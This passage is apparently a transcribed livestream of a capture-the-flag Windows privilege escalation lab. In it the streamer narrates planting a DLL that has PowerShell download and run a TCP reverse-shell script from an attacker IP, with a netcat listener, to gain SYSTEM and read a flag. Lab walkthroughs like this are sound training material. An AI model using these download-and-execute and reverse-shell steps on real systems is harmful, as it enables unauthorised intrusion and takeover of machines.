back. We're going to get this file, this invoke PowerShell TCP file, .ps1 up here, right? It's going to go through, it's going to look at this file, and then it's actually going to run this bottom part. Since invoke PowerShell TCP is going to be on the system, because we did the invoke expression, invoke web request for it, so it's already running in memory on the system, it should automatically run this guy at the very end. Should. We're going to find out. So let's go ahead and do a nc tag lvmp 4444. All right. And we will see if we get something back here. So what I want to try to do is we're going to try to nano proxy.c. Well, actually, we don't even want to nano that, do we? I want to actually do, yeah, we do proxy.c. Proxy.c. And let's go ahead and try to do a system. We're going to do a command slash, what is it, slash C for execute? Is that correct? Let's go ahead and try like real quick over here. Let's go ahead and go to command prompt. Is it command slash C or slash K? Okay, so that didn't do anything. Okay, let's go ahead and try that again. Command slash C PowerShell.exe. Let's go ahead and do something that only PowerShell can do. So we'll do a wget. Let's go like this. Wget HTTP 10. No, let's just do it regularly because I'm going to need to do some weird stuff with invoke expression. Wget HTTP 10.13.26.184 slash. I need a file. We'll just say proxy.c. And doesn't look like we actually got it. Or if we just do PowerShell, if we just copy PowerShell.exe and just type all that in, if that'll work. And if we'll get that file or not. So he definitely got it. I mean, we didn't do an out file, so we went out and we grabbed it. Okay, so now, so we know that who am I works. Let's just go ahead and just do system. We're just going to type in PowerShell.exe, and then we're going to do an IEX, IWR, use basic parsing, just in case, for HTTP 10.13.26.184, right? Slash, and we want to throw on there invoke. Oh, I have to do it because we are on Windows here, or we are on Linux, so it is case sensitive. We want to throw that onto there. I wonder if I'm going to have to do something like this so that it doesn't mess with it. Probably not, because I'm throwing it onto a Windows machine, so I actually shouldn't mess with it at all. Invoke PowerShell TCP.ps1, and we don't need to put that in output.txt. We don't need to do anything with that, actually. There we go. So we got that guy should be getting closed out by him. Do I have to do another one of these? No. I don't know if that's actually going to work like right there. We can try it. I'm thinking it should work because we still haven't encompassed. Let's try it. Let's go ahead and do that. Let's see here. We don't need to do any of that, right? We just need to go ahead and compile him, correct? So we need to compile him now. So we're going to compile him with, go ahead and look at my own notes here. There we go. Yep, proxy dev, proxy o, tag, proxy.dll. So I guess we're just going to compile him like that. And he's going to run proxy.c, I take it. Okay, let's try it. Yeah, /c should work, but I'm thinking if we can already run PowerShell on it, just PowerShell.exe, I'm thinking we can just bypass that whole portion of it and just try to do. Let's go ahead and throw that file over there now. So we did wget for it last time, right? So we should have a new proxy DLL file. Which is actually the same exact size. Okay. Let's go ahead and try to throw it over there and see what happens. Because I think we did everything we needed to do. We just need to change that one guy out like right there. And we should just be able to move that proxy C back over, or proxy.dll back over. And from there, rename it. So let's go ahead and back over into Windows. All right. Actually, our proxy.dll. Oh. Attack out file is going to be proxy.dll. Let's go ahead and do a dir. And we have our proxy.dll like right there. Okay. So let's go ahead and move him. Do our move right. So I copy and paste that whole command. We're just going to copy and paste from here. Proxy.dll into there. May say the file exists. Overwrite, yes. Okay, so one file has been moved. So let's repair this guy again. I think that's all we had to do after that, right? We just had to repair it. And hopefully we get a call back over here. Hopefully we do. I don't know if what's going to mess it up, but we'll see. Let's go ahead and modify. Next. Repair. Repair. And we'll see what happens here. Making this way more harder than it has to be, because we could just download netcat binary, which is actually already on there also. So if this one doesn't work, we'll go ahead and we'll redo it with that netcat binary and just do it like that. Ayo! Let's go! Who am I? We are NT Authority System. Let's go and CD into Users, Administrator. If anybody's got any questions on how the hell we just did that, let me know, please. And let's go ahead and cat that, well, yeah, cat that flag.text. Could also do type. Let's go. Can be TCM, PMPT live, free live training. Oh, is it starting? If it's starting like right now, I'm about to just stop streaming. About to just, there you go. Done. If that just started, then I'm going to be done streaming with that. And we will do tools of the trade later on today after that's finished off with. Let's go ahead and check it out like real quick. Nope, Wednesday. Okay. Wednesday it starts up. All right. So tools of the trade. All right. We have already used power up, which I find to be one of the tools of the trade, like right there. Actually, we're done. That was it. That was the last thing, like right there. Let me go ahead and I'm actually going to take a cat proxy.c over here. I'm actually going to show that, hey, we did that guy right there, and yes, it did work. And then we'll go ahead and we'll show that, hey, who am I? We'll show that we got a callback over here for it. Remember to change the end of invoke PowerShell TCP.ps1 to actually run the command. Start listener. And we got that. There we go. Let's go. All right, so that starts on Wednesday. So the Academy training is going to start on Wednesday, which means that is not going to be the day that, I don't think anyone's going to be streaming at that time. Yeah, sure, why not? Exit out of here, don't care, don't care, don't care. And we have finished up with that box. Then we have tools of trade. We have WinPs, Privest Checker. We have Exploit Suggester, which we've used that before. Well, I've never used the Exploit Suggester, the newest one or whatever, the next generation one with Pi on there. I've never done that one before. So to use the script, we will need to run system info. So actually, I'm actually going to take a print screen of these guys like right here. And that will be it for today. For at least this guy right here. I'll be on later tonight. Or not even later tonight. It's going to be, probably in hour and a half, 2 hours or so. But tools of the trade. Was this a new room you did? No, I don't think it is. I think it's newer. It is because one of the passwords had 2022 in it. But it's Windows Privilege Escalation. We started it yesterday, got all the way down to like abusing surge misconfigurations, and then I just started getting tired, and that was about it for yesterday. And today we just decided let's finish this up. But no, it's not a new room. I think it is newer though. And then obviously Metasploit with local. Is this Tibbs room? I don't know. Created by Myrna. This was, I think, the last Windows Privilege Escalation room that I had to do, actually. So, yeah, if I look back through on the Windows Privilege Escalation rooms, I want to press back. But that's going to be it for that video, like right there. So, thanks a lot for everyone that stuck around and everything. Especially the Raiders. Thanks a lot for coming in.